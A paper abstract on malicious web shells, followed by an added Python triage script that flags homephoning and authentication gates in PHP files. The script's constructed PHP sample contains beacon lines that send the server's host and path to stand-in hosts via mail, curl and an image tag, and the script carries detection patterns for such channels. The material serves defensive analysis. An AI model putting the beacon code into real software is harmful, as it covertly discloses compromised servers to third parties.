No Honor Among Thieves: A Large-Scale Analysis of Malicious Web Shells

Web shells are malicious scripts that attackers upload to a compromised web server in order to remotely execute arbitrary commands, maintain their access, and elevate their privileges. Despite their high prevalence in practice and heavy involvement in security breaches, web shells have never been the direct subject of any study. Instead, web shells have been treated as malicious black boxes that need to be detected and removed, rather than as malicious pieces of software that need to be analyzed and understood in detail. In this paper, we report on the first comprehensive study of web shells. By utilizing different static and dynamic analysis methods, we discover and quantify the visible and invisible features offered by popular malicious shells, and we discuss how attackers can take advantage of these features. Among visible features, we find password brute-forcers, SQL database clients, port scanners, and checks for the presence of security software installed on the compromised server. In terms of invisible features, we find that about half of the analyzed shells contain an authentication mechanism, but this mechanism can be bypassed in a third of the cases. Furthermore, we find that about a third of the analyzed shells perform homephoning, i.e., upon execution, the shells surreptitiously communicate with various third parties with the intent of revealing the location of new shell installations. By setting up honeypots, we quantify the number of third-party attackers benefiting from shell installations and show how an attacker, by merely registering the appropriate domains, can completely take over all installations of specific vulnerable shells.
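As an added illustration of the homephoning and authentication findings summarized above (this is example code written for this page, not code from the paper or its authors), the following Python triage script scans PHP source for constructs that can carry data off the server, flags a file as likely homephoning only when such a construct is paired with an expression that reveals the script's own location, lists the external hosts it contacts so a defender can block or sinkhole them, and notes whether an authentication gate is present. The indicator patterns and the two sample PHP files are assumptions constructed for the example and are not taken from the paper's data set.

```python
import re
from dataclasses import dataclass, field

# Constructs that can send data to a third party (assumed generic PHP idioms, not the paper's feature list).
OUTBOUND_PATTERNS = {
    "curl": re.compile(r"\bcurl_init\s*\(", re.I),
    "remote_fetch": re.compile(r"\b(?:file_get_contents|fopen|fsockopen)\s*\(\s*['\"]https?://", re.I),
    "img_beacon": re.compile(r"<img[^>]*\bsrc\s*=\s*['\"]https?://", re.I),
    "mail": re.compile(r"\bmail\s*\(", re.I),
}
# Expressions that disclose where the script itself is installed.
SELF_LOCATION = re.compile(
    r"\$_SERVER\s*\[\s*['\"](?:HTTP_HOST|SERVER_NAME|REQUEST_URI|SCRIPT_NAME)['\"]\s*\]|__FILE__", re.I)
# Host part of any hard-coded URL; these are the candidates for blocking.
HOST_IN_URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Signs of a password or cookie gate in front of the script's functionality.
AUTH_PATTERNS = {
    "password_compare": re.compile(r"(?:md5|sha1|hash)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "cookie_gate": re.compile(r"\$_COOKIE\s*\[", re.I),
    "password_var": re.compile(r"\$(?:auth_pass|pass(?:word|wd)?)\b", re.I),
}


@dataclass
class Triage:
    path: str
    outbound: list[str] = field(default_factory=list)
    contacted_hosts: list[str] = field(default_factory=list)
    reveals_self_location: bool = False
    auth_indicators: list[str] = field(default_factory=list)

    @property
    def likely_homephoning(self) -> bool:
        # A beacon needs both a channel out and something worth sending: the script's own location.
        # mail() by itself is a weak signal (contact forms use it too), so it is not enough alone.
        return bool(self.outbound) and self.reveals_self_location

    @property
    def has_authentication(self) -> bool:
        return bool(self.auth_indicators)


def triage_php(path: str, source: str, local_hosts: tuple[str, ...] = ()) -> Triage:
    """Static triage of one PHP file; local_hosts are the site's own names, excluded from contacts."""
    t = Triage(path=path)
    t.outbound = sorted(name for name, pat in OUTBOUND_PATTERNS.items() if pat.search(source))
    own = {h.lower() for h in local_hosts}
    t.contacted_hosts = sorted({h.lower() for h in HOST_IN_URL.findall(source)} - own)
    t.reveals_self_location = SELF_LOCATION.search(source) is not None
    t.auth_indicators = sorted(name for name, pat in AUTH_PATTERNS.items() if pat.search(source))
    return t


# Constructed sample 1: a password gate followed by three ways of reporting the install location.
BEACONING_SAMPLE = r'''<?php
$auth_pass = "constructed-hash-placeholder";
if (md5($_POST['pass']) !== $auth_pass) { die("404"); }
@mail("drop@collector.example", "new install", $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$ch = curl_init("http://tracker.example/ping?u=" . urlencode($_SERVER['HTTP_HOST']));
echo "<img src='http://beacon.example/i.gif'>";
?>'''

# Constructed sample 2: a benign contact form; mail() alone must not trip the homephoning flag.
CONTACT_FORM_SAMPLE = r'''<?php
if (isset($_POST['msg'])) {
    mail("owner@example", "Website contact", $_POST['msg']);
}
?>'''


def triage_samples() -> dict[str, Triage]:
    """Run the triage over both constructed samples, keyed by their (constructed) file names."""
    return {
        "shell.php": triage_php("shell.php", BEACONING_SAMPLE),
        "contact.php": triage_php("contact.php", CONTACT_FORM_SAMPLE),
    }


if __name__ == "__main__":
    for path, result in triage_samples().items():
        print(f"{path}: homephoning={result.likely_homephoning} auth={result.has_authentication} "
              f"outbound={result.outbound} hosts={result.contacted_hosts}")
```

Run the script directly to see both verdicts; in practice, feed it the PHP files found under a web root and treat `contacted_hosts` from any file that scores `likely_homephoning` as candidates for egress blocking and for checking whether the domain is still registered, since the abstract's takeover finding hinges on exactly those hard-coded domains.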
